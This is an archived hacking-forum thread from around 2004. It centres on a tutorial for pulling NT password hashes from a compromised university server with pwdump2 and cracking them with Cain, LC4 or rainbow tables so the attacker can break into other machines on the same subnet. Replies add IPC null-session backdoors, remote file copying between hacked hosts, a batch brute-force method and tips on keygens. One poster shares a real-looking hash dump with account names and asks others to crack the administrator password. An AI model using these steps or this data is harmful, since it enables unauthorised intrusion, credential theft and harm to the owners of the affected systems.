Imagine situation: you've hacked a stro using one of the exploits, this stro is very fast (university), so you want to hack some more stros from this subnet. But all other servers are invulnerable to your exploits.
What can you do? It's usual situation, when an admin of the network uses the same password on each machine, so the problem is to discover this password.
Download a nice program called "Cain" from www.oxid.it . Then run tlist on your stro, you'll get:
Full Version: [tutorial] How To Crack Nt Password
| CODE |
smss.exe 612 csrss.exe 660 winlogon.exe 684 services.exe 728 lsass.exe 740 svchost.exe 908 svchost.exe 968 svchost.exe 1052 svchost.exe 1072 spoolsv.exe 1288 Avsynmgr.exe 1372 cisvc.exe 1384 |
Now, you type this command:
pwdump2 [PID lsass.exe] >pass.txt
In our case it will be:
pwdump2 740 >pass.txt
You will see the hashes of all accounts:
| CODE |
Administrator:500:a1a11bac18e44431aad3b435b51404ee:02b58cf4414428592c9d4e92789edffb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:1704fcfb70f5dd3a7f31b12ffdbf6b8e:e6331acad40185335126799f1d1777fe::: VUSR_SERVER:1004:2099121e60019c2dc81a1befd3d77a5d:65f828d66f15bac2ce55c248186ee087::: |
Now, download a nice wordlist, it contains more tha 15000000 words:
http://download.elcomsoft.com/english.zip
Run Cain, go to Configure - Dictionary, change the file to english.txt, remove all options except of two numbers hybrid brute (very usefull option). Go to Cracker - LM&NTLM Hashes, right click on the table - add to list, add your pass.txt . Then right click on the account and choose dictionary attack or brute force attack.
BTW, Cain supports Rainbow hashes table.
If you find admin's password, you might be able to hack more servers on this subnet.
The Adminaccount is: Administrator 5090
32 sec. with LC4
I think LC4 is the best tool to crack Adminpasses .
Thx for this TUT i will test Cain & Abel
32 sec. with LC4
I think LC4 is the best tool to crack Adminpasses .
Thx for this TUT i will test Cain & Abel
LC4 doesn't support Rainbow tables.
yes but the brute from LC4 is (filtered) good
4h max and i have a pass A-Z 0-9
4h max and i have a pass A-Z 0-9
hmm
interesting
thanx a lot
gonna test it locally
interesting
thanx a lot
gonna test it locally
Hmmzzz thanks fro the tut and all...But How could you know whenever there is a network there??
Cuz Cracking Passes of the local PC is pretty useless if you already hacked it...
Cheerz.
Cuz Cracking Passes of the local PC is pretty useless if you already hacked it...
Cheerz.
thanx for this nice tut
| QUOTE (ducky @ Feb 4 2004, 12:16 PM) |
| Hmmzzz thanks fro the tut and all...But How could you know whenever there is a network there?? Cuz Cracking Passes of the local PC is pretty useless if you already hacked it... Cheerz. |
If the hacked PC belongs to university or big company, you can be sure that there is a network.
| QUOTE |
| Hmmzzz thanks fro the tut and all...But How could you know whenever there is a network there?? Cuz Cracking Passes of the local PC is pretty useless if you already hacked it... |
Thats not right. When you have cracked the password then you have a really nice backdoor (when port 139 is open). Then you can always access the server with an IPC Nullsession.
I dont know, if port 139 is closed there must be a way to open it and so you can always access the server.
Greetings Demoman
| QUOTE |
| Thats not right. When you have cracked the password then you have a really nice backdoor (when port 139 is open). Then you can always access the server with an IPC Nullsession. |
also, dont forget about port 445, you can establish a null session through that also.
Many thanks for this tut, seems very simple, will have to add to my collection.
it took 3sec with JTR to crack the administrator pass
thanx for the tut dude
i always use LC4 but this is nice 2!
i always use LC4 but this is nice 2!
i know this way
but somehow when im cracking the pass
im trying to hack with it other computers on the same network with it in NT pass
but it seems that the password is incorrect
but somehow when im cracking the pass
im trying to hack with it other computers on the same network with it in NT pass
but it seems that the password is incorrect
But how to use rainbow tables?
moin
tools for cracking nt/w2k or xp accounts:
LC4 is a nice tool, but if the password longer than 8 letters and alpha-nummeric you're (filtered)!
Cain very useful! It's a powerfull allround tool for sniffing, cracking usw...
I have found "pwsex" from elcomsoft (http://www.elcomsoft.com/pwsex.html)
I think that's the new version of ANTexp.
It's support the rainbow tables... that's fast!
sometimes it's better if you crack the ftp password (if you now the username).
On windows systems are the passwords often the same...
let's rulez!
tools for cracking nt/w2k or xp accounts:
LC4 is a nice tool, but if the password longer than 8 letters and alpha-nummeric you're (filtered)!
Cain very useful! It's a powerfull allround tool for sniffing, cracking usw...
I have found "pwsex" from elcomsoft (http://www.elcomsoft.com/pwsex.html)
I think that's the new version of ANTexp.
It's support the rainbow tables... that's fast!
sometimes it's better if you crack the ftp password (if you now the username).
On windows systems are the passwords often the same...
let's rulez!
| QUOTE (kuhler @ Feb 5 2004, 08:25 AM) |
| LC4 is a nice tool, but if the password longer than 8 letters and alpha-nummeric you're (filtered)! |
i cracked my 11 character alpha-numeric password with LC4 in about an hour (none of the parts were in a dictionary either)
I often guessing password crack in other network Segment..
I get many informaiton your tutorial..
Thank You..
I often used cain..
BUT company is down same segment Hub and switch..
Cain&Abel is so Strong..
Bye..Bye..
| QUOTE (nulladd @ Feb 5 2004, 04:19 AM) | ||
i cracked my 11 character alpha-numeric password with LC4 in about an hour (none of the parts were in a dictionary either) |
You were able to crack an 11 char password because of the weakness of LanManager hashes. LC4 along with the others crack each password by segments of 7 chars. So it tries half of the lanman hash first, then tries to crack the second half. And for those of you who are wondering about rainbow tables, RainbowCrack is definitely the way to go. For the alpha-numeric charset, generating the tables on a fairly new computer will take a few days. After that, cracking lanman, md5, or sha1 hashes (u must generate seperate sets of tables for each) is a breeze
thank you for the tips Progressor. i'm grabbing the files and test it on my network. just a question if you don't mind. what is the tool to copy a file from puter A to puter 2 on the same network? you can send me a pm if you want.
i know dameware will be able to do that but let's keep it out of the list atm.
i know dameware will be able to do that but let's keep it out of the list atm.
| QUOTE |
| thank you for the tips Progressor. i'm grabbing the files and test it on my network. just a question if you don't mind. what is the tool to copy a file from puter A to puter 2 on the same network? |
hmm, feeling helpful today
net use z: \\computer\share
xcopy /e c:\files\ z:\folder
hey Asuka, thank you man
i've never thought of that command could be applied remotely from box A -> B.
silly me, lol.
i'm always thinking that i can only apply that from my local box to a remote. well, too much drinking makes my brain messy
i've never thought of that command could be applied remotely from box A -> B.
silly me, lol.
i'm always thinking that i can only apply that from my local box to a remote. well, too much drinking makes my brain messy
| QUOTE (Copkill @ Feb 4 2004, 08:33 AM) |
| I think LC4 is the best tool to crack Adminpasses. |
Is there any way I can brute force hack a password without having to buy LC4?
they are a lot of others crackers, and if you want use LC4, you can find a keygen on google
that's legal right?
i know this is a noob question, but hey that's what i am...
where do you use tlist? i am learning bash, is it in another? why have i never heard of this command...
i know this is a noob question, but hey that's what i am...
where do you use tlist? i am learning bash, is it in another? why have i never heard of this command...
i'll try this tips...
Hasnt most ISPs blocked port 139 since the "blaster" virus/worm
therefore making Netbios Hacking a thing of the past????
And yes Blazeking u can wit a batch script that reads words n shit from a Txt file and then echo the words to a Net Use command trying each one untill your in!
There is a batch script on the site somewhere i saw but forgot whereabouts
Ill try finding it now, other than the batch script you need a properly formatted word list and the remote computers IP n stuff
Or alternatively you could just find a keygen to LC 4 (google)
therefore making Netbios Hacking a thing of the past????
And yes Blazeking u can wit a batch script that reads words n shit from a Txt file and then echo the words to a Net Use command trying each one untill your in!
There is a batch script on the site somewhere i saw but forgot whereabouts
Ill try finding it now, other than the batch script you need a properly formatted word list and the remote computers IP n stuff
Or alternatively you could just find a keygen to LC 4 (google)
"There is a batch script on the site somewhere i saw but forgot whereabouts
Ill try finding it now, other than the batch script you need a properly formatted word list and the remote computers IP n stuff"
a properly formatted word list? where would i get this? or how would i make it? just point me in the right direction... i can read if this is too noob, just have to know what to read and where to do that.
Ill try finding it now, other than the batch script you need a properly formatted word list and the remote computers IP n stuff"
a properly formatted word list? where would i get this? or how would i make it? just point me in the right direction... i can read if this is too noob, just have to know what to read and where to do that.
It's working like a charm, very nice, thanks a lot
| QUOTE (blazeking @ Feb 6 2004, 09:56 PM) |
| that's legal right? |
Of course not
Hi guys, i'm french
i like the web site
and say that this is
a NICE TOOL :-)
but do you know nt2kxp cracker with john the ripper's modul ?
i try it on a 2003 server but it doesn't work
does pwdump2 work on 2003 server ?
Thx
bye bye
i like the web site
and say that this is
a NICE TOOL :-)
but do you know nt2kxp cracker with john the ripper's modul ?
i try it on a 2003 server but it doesn't work
does pwdump2 work on 2003 server ?
Thx
bye bye
ok well if you have lc4 there will be a fairly basic one with that 
,
otherwize i guess you should check the first post in this thread!
i hope that helps you out
,otherwize i guess you should check the first post in this thread!
i hope that helps you out
hello all, I found that as password:
unfortunately, I did not succeed in decrypting them as bruteforce whive all the caracters and all the numbers and all the special caracthers too
with: Cain
with: pwsex
is there someone that know how i can decrypt these codes,
I would really like to have the administrator password.
unfortunately, I did not succeed in decrypting them as bruteforce whive all the caracters and all the numbers and all the special caracthers too
with: Cain
with: pwsex
is there someone that know how i can decrypt these codes,
I would really like to have the administrator password.
| CODE |
Administrator:500:97a96968149f7bec6d3a627c824f029f:2d39101570c0c96c5b88de6682feaf1e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: IUSR_LIBPROXY:1000:d6b40f5967b35c2e69fa2f58b6e03ff9:e1d2f646a313c6944a88c6fa37c5a53b::: IWAM_LIBPROXY:1002:7e7c0a16217dcafc57a24b3005d0da52:b888222ed4b297ede77c7c56cc994b83::: kbrady:1004:c19ee4163f76f3ad4bceae59e5d1c0cb:21dd8f8d8aa444ff7d824ba48d9fb2d4::: ltc:1007:884923c46c5d326caad3b435b51404ee:af284184490b6317e9a88b2bc047d935::: Patrick:1008:884923c46c5d326caad3b435b51404ee:af284184490b6317e9a88b2bc047d935::: sean:1006:97a96968149f7bec6d3a627c824f029f:2d39101570c0c96c5b88de6682feaf1e::: students:1003:b7c7f044cdeb84b7aad3b435b51404ee:859f626c96975d802da4730c3dfdea3e::: sunline:1009:387bcc7bfdddee33aad3b435b51404ee:0c7763e748e656e2742b726c93db3d25::: |
thank you with all
we can launch a contest if you prefer, to the first which is able to
decrypt it
decrypt it
nice tut, cain is probably the best brute cracker i've come across
I use LC4 . gives pretty good results ..
took about 4 hours to crack my password which was laxuqo27
took about 4 hours to crack my password which was laxuqo27
i dont think that LC4 is such a greet program because with a strong password it needs 26 to crack it.
I think using rainbow crack is a much better way
I think using rainbow crack is a much better way
Hi, where can i get LC4?
And the passlist is down.can u upp it?
And the passlist is down.can u upp it?
http://download.elcomsoft.com/english.zip dont work, cant find any good results with google? can some get a new link? or upload to the board?
This is a good method, it cracked my password(with brute force) after 4 hours...
or upload to the board? This is a good method, it cracked my password(with brute force) after 4 hours...
if we have account IUSR_COMPNAME, how we can crack pass on NT?, i have use program like getadmin.exe but it's dead, Anti virus detect getadmin.exe.....
Anybody can help me???
Anybody can help me???
getadmin is too old, it's not gonna help you.
By the way try to use SamInside. It's much faster than LC4
Here is the link:
http://www.topshareware.com/SAMInside-download-5188.htm
It's really good
By the way try to use SamInside. It's much faster than LC4
Here is the link:
http://www.topshareware.com/SAMInside-download-5188.htm
It's really good
usually in order to crack the password, you need to have admin rights. this tutorial is only for those who have done it and those who have not it's probably useless but it's good to read it for knowledge
mmm interesting
does anybody have performance comparisions between lm brute forcers (hashes per second on certain spec machines)
if not ill probly test em all
if not ill probly test em all
| QUOTE |
| does anybody have performance comparisions between lm brute forcers (hashes per second on certain spec machines) if not ill probly test em all |
there might probably be tools out there that does the same thing that we dont even know off
maybe faster than LC4 and rainbowtables or pwsex.
thats why i asked
actually... theres several versions of the DES algorithm floating around, some modded from openssl, so im thinking, why not replace the rainbowcrack one with an optimised version (it even states this on the site - rainbowcrack only uses standard openssl DES)
actually... theres several versions of the DES algorithm floating around, some modded from openssl, so im thinking, why not replace the rainbowcrack one with an optimised version (it even states this on the site - rainbowcrack only uses standard openssl DES)
is it possible to get the hashes through a user-account or do I need a administrator-account to get them??
THX!
THX!
yes it possible if u ahve upload and execute axx
btw guyz
i have cracked the admin password
when i am doing "net view" i got several computers can i do with them something plz help
btw guyz
i have cracked the admin password
when i am doing "net view" i got several computers can i do with them something plz help
very interesting topic i am addicting on my favourite
obs1 : i think it's possible to change the current user right on the comp reboot
obs2 : 139 port disabled
==> i don't know how an isp can do it on a remote comp, it can make a blocking redirection on it's router but it doesn't affects you lan's comp.
so if you have access on the lan's comp, you can use that door even if the isp has blocked its access (i thought the net worm spreaders use the 135 and 137 ports as my firewall shows it)
lol
obs1 : i think it's possible to change the current user right on the comp reboot
obs2 : 139 port disabled
==> i don't know how an isp can do it on a remote comp, it can make a blocking redirection on it's router but it doesn't affects you lan's comp.
so if you have access on the lan's comp, you can use that door even if the isp has blocked its access (i thought the net worm spreaders use the 135 and 137 ports as my firewall shows it)
lol
Do you know a brutforce cracker which can work on many computer on netbsd by ssh login ?
For the password larger than 10 caracters or more, this could be helpfull
For the password larger than 10 caracters or more, this could be helpfull
hi, first of all thx for the tutorial, it has been very usefull.. but i have a problem..
everytime when i use a pass cracking tool such as cain or lc 3
i have a cpu usage of 100%... my cpu gets to hot and soon or later i will be able to grill some ham and eggs or a steak on it =) .. that could be an advantage if you want to have a good barbecue with your neighboors, but i defenitly just want to crack the pass..
solutions?
edit: system information: P4 2,8 ghz and msi mb running win nt 5.1 sp1
everytime when i use a pass cracking tool such as cain or lc 3
i have a cpu usage of 100%... my cpu gets to hot and soon or later i will be able to grill some ham and eggs or a steak on it =) .. that could be an advantage if you want to have a good barbecue with your neighboors, but i defenitly just want to crack the pass..
solutions?
edit: system information: P4 2,8 ghz and msi mb running win nt 5.1 sp1
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
